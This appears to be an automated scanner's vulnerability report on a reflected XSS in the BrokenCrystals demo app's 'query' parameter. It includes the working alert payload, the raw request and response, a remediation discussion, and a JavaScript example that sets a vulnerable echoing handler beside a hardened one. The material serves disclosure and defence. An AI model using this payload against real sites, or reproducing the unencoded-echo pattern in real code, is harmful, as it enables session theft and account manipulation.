
Reflective Cross-site scripting (rXSS) #5

Description

@bright-security

Reflective Cross-site scripting (rXSS)

Severity: High. Discovered: 10 October 2022, 11:11 PM

CWE ID

CWE-79

CVSS

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Details

This vulnerability was found in the query string by changing the value of the parameter "query".
The value '"}}]]<div OnCliCk=alert(336728)></div> was injected, which caused the target to execute an alert function with the value 336728, verifying that the JavaScript injection was successful.
The response below echoes the injected value unencoded inside a server-side error message served with Content-Type text/html, and the response's Content-Security-Policy (default-src * 'unsafe-inline' 'unsafe-eval') does not block the inline onclick handler. Note also that x-content-type-options: 1 is not a valid value for that header (the only defined value is nosniff), so it offers no protection here.

Possible exposure

Abusing Reflective XSS might allow an attacker to inject a malicious payload into a link a victim follows, steal session cookies and other sensitive data, or manipulate the user's interaction with the application on the victim's behalf.

Remediation suggestions

To remedy this vulnerability, proper input validation should be applied to the "query" parameter, and any value that is reflected back to the client must be output-encoded for the context it lands in (HTML entity encoding for an HTML body, or a JSON response with Content-Type application/json and X-Content-Type-Options: nosniff).
The best course of action is not to blacklist or disallow specific characters, but instead to verify that the input has the expected type and structure and to reject anything else.
For example, the value of the above parameter is detected as type MultiParse::DataType::String. A good first check is to confirm that the value is exactly that: a plain string of bounded length and expected character set, not a serialized structure such as JSON.
Another good approach is to validate that integer fields accept only integers, that text fields accept only alphabetical characters (where possible), and that structured types (such as JSON or other formatted objects) are verified and parsed before being processed and reflected back to the user. Error messages should be generic and must never echo raw user input.
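The following is an added example, not code from BrokenCrystals or from the scanner report: it places the reflection pattern behind this finding (a handler that echoes the raw parameter into a text/html error body) beside a hardened handler that validates the parameter's structure, answers as JSON with nosniff, and never includes raw input in an error reply, plus the reproduction check a tester would run against both. The payload is the one from the request above; the handler shape (a function returning {status, headers, body}), the character allowlist, and the stand-in count logic are assumptions made so the example runs without a web framework or database.

```javascript
// Added example (not BrokenCrystals code). Payload copied from the report's request.
const PAYLOAD = '\'"}}]]<div OnCliCk=alert(336728)></div>';

// Vulnerable pattern: an error path that echoes the raw parameter into a
// text/html body, so any HTML in `query` is rendered by the browser.
// The message format is a constructed stand-in for the error seen in the response.
function vulnerableCount(query) {
  const message = `${query} - unterminated quoted string at or near "${query}"`;
  return { status: 200, headers: { 'content-type': 'text/html' }, body: message };
}

// HTML entity encoding for text placed inside an HTML element body.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Structural validation (assumption: the count endpoint takes a short free-text
// search term). Accept only a plain string of letters, digits and a few
// punctuation characters within a length bound; everything else is rejected.
// This is an allowlist on shape, not a blacklist of '<' or quotes.
const QUERY_RE = /^[\p{L}\p{N} .,_-]{1,64}$/u;
function validateQuery(value) {
  if (typeof value !== 'string') return { ok: false, reason: 'not a string' };
  if (!QUERY_RE.test(value)) return { ok: false, reason: 'unexpected characters or length' };
  return { ok: true, value };
}

// Hardened handler: validate first, answer as JSON with nosniff and a strict
// CSP, and keep the error reply generic (the raw input never appears in it).
function hardenedCount(query) {
  const headers = {
    'content-type': 'application/json; charset=utf-8',
    'x-content-type-options': 'nosniff',
    'content-security-policy': "default-src 'self'",
  };
  const v = validateQuery(query);
  if (!v.ok) {
    return { status: 400, headers, body: JSON.stringify({ error: 'invalid query parameter' }) };
  }
  // A real handler would run a parameterised database query here (assumption);
  // the term's length is a deterministic stand-in so the example runs offline.
  const count = v.value.length;
  return { status: 200, headers, body: JSON.stringify({ query: v.value, count }) };
}

// If the endpoint genuinely must answer with HTML, the other half of the fix is
// encoding at the point of insertion: the payload arrives as inert text.
function htmlMessage(query) {
  return `<p>No results for ${escapeHtml(query)}</p>`;
}

// Reproduction check: does the body contain the payload byte-for-byte while
// being served as HTML? True means the browser will execute the onclick handler.
function reflectsUnencoded(resp, payload) {
  const isHtml = /^text\/html/i.test(resp.headers['content-type'] || '');
  return isHtml && resp.body.includes(payload);
}

function demo() {
  return {
    vulnerableReflects: reflectsUnencoded(vulnerableCount(PAYLOAD), PAYLOAD), // true
    hardenedReflects: reflectsUnencoded(hardenedCount(PAYLOAD), PAYLOAD),     // false
    hardenedStatus: hardenedCount(PAYLOAD).status,                            // 400
    encoded: escapeHtml(PAYLOAD),
  };
}

console.log(demo());
```

The allowlist regex is deliberately narrow; loosen it to whatever the search field really needs, but keep the rule that the decision is "does this look like a search term" rather than "does it contain a dangerous character". The JSON response plus nosniff removes the HTML rendering context entirely, which is why the hardened handler does not need to HTML-encode the term it returns; htmlMessage shows the encoding that would be required if an HTML body were kept.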

Request

GET https://brokencrystals.com/api/testimonials/count?query=%27%22%7D%7D%5D%5D%3Cdiv+OnCliCk%3Dalert%28336728%29%3E%3C%2Fdiv%3E HTTP/1.1
Accept: application/json, text/plain, */*
Referer: https://brokencrystals.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept-Encoding: identity
Content-Length: 0

Response

HTTP/1.1 200
Connection: keep-alive
Content-Length: 121
Content-Type: text/html
Date: Mon, 10 Oct 2022 23:11:11 GMT
Server: nginx/1.19.8
access-control-allow-origin: *
content-security-policy: default-src  * 'unsafe-inline' 'unsafe-eval'
strict-transport-security: max-age=0
vary: Origin
x-content-type-options: 1
x-xss-protection: 0
set-cookie: bc-calls-counter=1665443471281

'"}}]]<div OnCliCk=alert(336728)></div> - unterminated quoted string at or near "'"}}]]<div OnCliCk=alert(336728)></div>"
